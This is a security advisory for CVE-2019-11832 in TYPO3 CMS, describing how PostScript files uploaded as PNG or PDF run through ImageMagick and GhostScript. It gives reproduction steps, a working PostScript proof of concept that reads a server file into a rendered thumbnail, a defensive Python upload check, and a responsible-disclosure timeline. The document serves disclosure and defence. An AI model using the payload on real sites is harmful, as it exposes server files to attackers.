ADVISORIES
CVE-2019-11832
The following (slightly modified) advisory was sent to the TYPO3 security team (security@typo3.org) on 28th January 2019.
The final security patch was released on 7th May 2019 in TYPO3 release 9.5.6 / 8.7.25; the corresponding security advisory from TYPO3 can be found here: https://typo3.org/security/advisory/typo3-core-sa-2019-012/.
Background
In January 2019 @jensvoid held a lecture at Ruhr-University Bochum about his PostScript related research and how to pwn the web using this ancient language. After his talk I did some private research and stumbled upon the following security issue in TYPO3.
Advisory
It has been discovered that TYPO3 CMS is vulnerable to arbitrary code execution using PostScript.
- Affected versions: <= 9.5.5
Problem Description
PostScript is a Turing-complete page description language. Because uploaded files are handed to ImageMagick, an attacker is able to upload PostScript files disguised as PNG or PDF files. As a result, they are able to execute arbitrary PostScript code.
Technical details
When creating thumbnails using ImageMagick methods, the library itself determines the format of the input from the file's content rather than from its extension, so the detected format may differ from the developer's expectation. Since PostScript is a programming language, it has to be interpreted in order to render the contents of a file. As a result, if the attacker manages to pass PostScript to ImageMagick, their code is executed on the webserver.
In the following examples the rendered preview of files in the backend is used to demonstrate the vulnerability.
Steps to reproduce
0) Setup
- Make sure GhostScript is installed on the webserver
apt update && apt install ghostscript
- Check TYPO3 Configuration at “Environment” > “Image Processing”, make sure the “Read pdf” section does not show any errors.
- Create a file at /tmp/secret.txt in order to demonstrate code execution and file inclusion later on
- We use the following file for our test. IMPORTANT: Save it with .pdf and .png as file extension!
Disclaimer: The following PS code was modified from https://lamehackersguide.blogspot.com/2017/02/weaponizing-postscript.html
%!PS
/infile (\/tmp\/secret.txt) (r) file def % open file
/buff 128 string def % buffer for reading
/Courier 30 selectfont % name and size of font
/LM 10 def % x coord
/ypos 700 def % y coord
LM ypos moveto
{ % loop
infile buff readstring % read chars to the buffer
{ %ifelse
buff cvs show % write the chars to the document
}{ %else
buff cvs show
infile closefile % close file pointer
exit % exit the loop
} ifelse
} bind loop
showpage
1) Filelist Module
- Upload the test file attached (or embedded above) via file upload in the File List Module
- Display details - a rendered preview thumbnail should be shown
- The thumbnail contains the contents from /tmp/secret.txt
2) Content Elements
- Create a new content element (type: “Text & Media”)
- Upload the test files to the content element
- Display rendered thumbnail
3) 3rd party extensions
Potentially, every third-party extension that enables file uploads and/or renders this kind of thumbnail in the backend or frontend may be vulnerable. File uploads in forms may extend the attack surface to non-authenticated users.
Fix
The ImageMagick wrapper has to handle its inputs carefully and must not pass unsafe PostScript to the ImageMagick layer. This functionality seems to be implemented in TYPO3\CMS\Core\Imaging\GraphicalFunctions.php.
In addition to that, GhostScript (which is used by ImageMagick internally) MUST run sandboxed.
Hint: The actual patch can be reviewed in this commit: https://github.com/TYPO3/TYPO3.CMS/commit/e845d90b82b2f72ab12a9e37f15082297832beca
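The technical details and the fix above both rest on one point: ImageMagick picks the decoder from the leading bytes of a file, not from its name, so an extension check alone never stops a PostScript file saved as .png or .pdf. The following is an added example (not TYPO3's patch, not ImageMagick's code) of a content-based pre-check a wrapper can run before handing an upload to ImageMagick. The signature tables, the `classify`/`validate_file` helpers and the sample headers are constructed for this example; the PostScript prefixes are the ones the ImageMagick PS coder is commonly documented to recognise, and the check is deliberately conservative (it also strips leading whitespace before looking for `%!`).

```python
"""Content-based pre-check for uploads before they reach ImageMagick.

Added example, not the TYPO3 fix: classify a file by its leading bytes the
way ImageMagick does, and refuse anything that would be routed to the
GhostScript delegate as PostScript, or whose content contradicts its name.
"""
from dataclasses import dataclass
from typing import Optional

# Leading-byte signatures, constructed from the public format specifications.
SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
EXTENSION_ALIASES = {"jpeg": "jpg"}

# Prefixes commonly documented for the ImageMagick PS/EPS coder (assumption):
# plain "%!", "%!" preceded by an EOT byte, and the DOS EPS binary header.
POSTSCRIPT_PREFIXES = (b"%!", b"\x04%!", b"\xc5\xd0\xd3\xc6")

# Formats whose thumbnailing still runs GhostScript even when the content is
# genuine; the advisory requires that interpreter to be sandboxed.
GHOSTSCRIPT_FORMATS = {"pdf"}


@dataclass(frozen=True)
class Verdict:
    accepted: bool
    detected: Optional[str]
    reason: str


def is_postscript(header: bytes) -> bool:
    """True if these bytes would be treated as PostScript/EPS."""
    # Conservative: tolerate leading whitespace before "%!" so that a padded
    # header is still caught.
    stripped = header.lstrip(b" \t\r\n")
    return any(stripped.startswith(p) or header.startswith(p)
               for p in POSTSCRIPT_PREFIXES)


def detect_format(header: bytes) -> Optional[str]:
    """Return the format implied by the leading bytes, or None if unknown."""
    for fmt, magics in SIGNATURES.items():
        if any(header.startswith(m) for m in magics):
            return fmt
    return None


def classify(header: bytes, declared_ext: str) -> Verdict:
    """Decide whether a file with this header may be passed to ImageMagick."""
    ext = declared_ext.lower().lstrip(".")
    ext = EXTENSION_ALIASES.get(ext, ext)
    if is_postscript(header):
        return Verdict(False, "ps", "PostScript content must not reach the ImageMagick delegate")
    detected = detect_format(header)
    if detected is None:
        return Verdict(False, None, "unrecognised content; do not let ImageMagick guess")
    if detected != ext:
        return Verdict(False, detected, f"content is {detected} but the name claims {ext}")
    if detected in GHOSTSCRIPT_FORMATS:
        return Verdict(True, detected, "genuine PDF: render only with a sandboxed GhostScript (-dSAFER)")
    return Verdict(True, detected, "signature matches the declared extension")


def validate_file(path: str, declared_ext: Optional[str] = None) -> Verdict:
    """Read the first 512 bytes of a file on disk and classify them."""
    with open(path, "rb") as fh:
        header = fh.read(512)
    if declared_ext is None:
        declared_ext = path.rsplit(".", 1)[-1] if "." in path else ""
    return classify(header, declared_ext)


if __name__ == "__main__":
    # Constructed sample headers; the first is a PostScript header under a .png name.
    samples = [
        (b"%!PS-Adobe-3.0\n%%Title: constructed sample\n", "png"),
        (b"\x89PNG\r\n\x1a\n" + b"\x00" * 16, "png"),
        (b"%PDF-1.4\n", "pdf"),
        (b"\x89PNG\r\n\x1a\n", "jpg"),
    ]
    for header, ext in samples:
        v = classify(header, ext)
        print(f"{ext:>4}: accepted={str(v.accepted):5} detected={v.detected} ({v.reason})")
```

Note that a genuine PDF still passes this check and is still rendered through GhostScript, which is why the check and the sandboxing requirement above belong together: the pre-check removes the disguised-PostScript case, the sandbox limits what any remaining interpreter run can do.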
Further Reading
The severity could become even higher, as several GhostScript CVEs have appeared in recent months and there is active research in this field, e.g.:
- Privilege Escalation using PostScript in GhostScript: CVE-2018-19409
- For further reading on PostScript: https://hacking-printers.net/wiki/index.php/Main_Page
- Awesome resources on hacking the web using PostScript (@jensvoid): https://www.springerprofessional.de/en/postscript-undead-pwning-the-web-with-a-35-years-old-language/16103774
Responsible Disclosure
TYPO3 core member Oliver Hader (@ohader) received this advisory and fixed the security flaw.
- 28th January 2019: Initial Report to security@typo3.org
- 28th January 2019: First response by Oliver Hader (security@typo3.org), Ticket#201901285760000013, follow-up questions
- 28th January 2019: Follow-up questions are answered.
- 30th January 2019: Oliver Hader (security@typo3.org): Investigations on ImageMagick policies
- 15th February 2019: Follow-up Information and more test cases are sent to security@typo3.org
- 18th March 2019: Heads-up, question current status
- 18th March 2019: Oliver Hader (security@typo3.org): Patch is currently being reviewed and tested; O.H. asks for my GitHub account.
- 10th - 12th April: Oliver Hader (security@typo3.org) provides a patch file, which is reviewed; the patch is successfully retested
- 7th May 2019: TYPO3 Security Update is released: https://github.com/TYPO3/TYPO3.CMS/releases/tag/v9.5.6